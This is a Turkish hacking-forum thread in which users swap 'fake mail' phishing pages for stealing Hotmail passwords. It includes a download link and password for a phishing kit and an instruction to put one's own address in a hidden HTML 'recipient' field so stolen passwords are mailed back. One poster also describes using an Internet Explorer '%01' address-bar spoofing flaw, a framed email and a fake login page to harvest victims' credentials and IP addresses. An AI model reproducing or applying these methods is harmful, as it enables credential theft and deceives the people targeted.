FAKE MAİL GERİ DÖNMÜO!!!
-
Arkadaslar werdiginiz fake mailleri kendi adreslerimden birinde uyguladım ama şifre geri dönmüor.
Bana çalışan bi fake mail atarmısınız (geri dönen :) ) msn adresimde :heavenboy1989@hotmail.com Burdanda atabilirsiniz cok teşekkürler...
-
al dostum sana yüzde yüz fake mail hayırlı uğurlu olsun...
al buraya tıkla 2 http://rapidshare.de/files/3082789/quake_hacker61_gmx-de.rar.html
açılan sayfada free yazan yere bas sonra en alta dowload yazıyor inndir zip şifresi quake_hacker61'dir
metin belgesini aç orda böyle bir yer var <INPUT type=hidden value=şifre_gelecek@hotmail.com name=recipient>
şifre gelecek yazan yere kendi hotmail adresini yaz sonra dosyaya bas htm olarak kaydet al sana kendim denedim yüzde yüz çalışıyor bu arada verdiğim linkte kesinlikle hiç bir trojan falan yoktur tahribah.com adminleri bakabilirler.
arkadaş dediklerimi yap fake mailin hazır ve kesin çalışıyor.
bu arada bu yöntem bana ait değildir quake_hacker61'e aittir kendisine teşşekür ediyorum...
-
tamam çalışmasına canvar gibi çalışıyor hemde çok hoşş ama hotmailin fake i değil ki bu arkdaş sanırım onu istiyor belirtmemiş ama
-
ceza link ölü ...en azından ben de öyle görünüyor.......
-
Abi tamam iyi actımda bu dosyayı nasıl cıkartıcam biliyormusunuz?(WinRAR arşiv yöneticisi) dosyayı cıkartamıyorum.yardımcı olursanız sevinirim
-
dostum yanlış anlama ama sen winrar dan dosya çıkaramıyorsan fake maili ne yapacaksın sorması ayıp??
-
ben indirdim hem link çalışıyor hemde fake mail çalışıyor bence sizde bi hata var
-
merhaba arkadaşlar aranıza yeni katıldım fake maili denedim ama indiremedim
-
bakın uzun zamandır takip ediyorumda hiç uğraşma yetisi olan göremiyorum çocuklar azcık kafanızı zorlayın hadi size bir abi olarak bir ufak taktik vereyim
iede %01 sayesinde adres satırında istediğiniz adresi çıkarabiliyorsunuz yani adama illaki fake atmanıza gerek yok siz bir tane asp php jsp yada her ne yazabiliyorsanız tasarım yapın adama bir mail atın main frameli bir mail main frame üzerinden sizin yaptığınız sayfaya gitsin ienin açığı sayesinde adres satırında artık hotmail.com mu mynet.com mu ne istiyorsanız onu yazdırın adam bakacak adres yerine hotmail.com o zaman login ol bir db kayıt sistemi yazın ki 5-10 satır lık şey adamın ıpsini imini dimini alın yani keklemek zor diil milleti kimsede demesin keklenmem sadece azcık araştırın açıkları bir noktaya kafayı sokmayın
-
vampire bunu yazdı:
bakın uzun zamandır takip ediyorumda hiç uğraşma yetisi olan göremiyorum çocuklar azcık kafanızı zorlayın hadi size bir abi olarak bir ufak taktik vereyim
iede %01 sayesinde adres satırında istediğiniz adresi çıkarabiliyorsunuz yani adama illaki fake atmanıza gerek yok siz bir tane asp php jsp yada her ne yazabiliyorsanız tasarım yapın adama bir mail atın main frameli bir mail main frame üzerinden sizin yaptığınız sayfaya gitsin ienin açığı sayesinde adres satırında artık hotmail.com mu mynet.com mu ne istiyorsanız onu yazdırın adam bakacak adres yerine hotmail.com o zaman login ol bir db kayıt sistemi yazın ki 5-10 satır lık şey adamın ıpsini imini dimini alın yani keklemek zor diil milleti kimsede demesin keklenmem sadece azcık araştırın açıkları bir noktaya kafayı sokmayın
dostum bu güzel bi fikir ama pek anlamadım biraz daha açıklayıcı bi döküman yazarsan mem. olurumm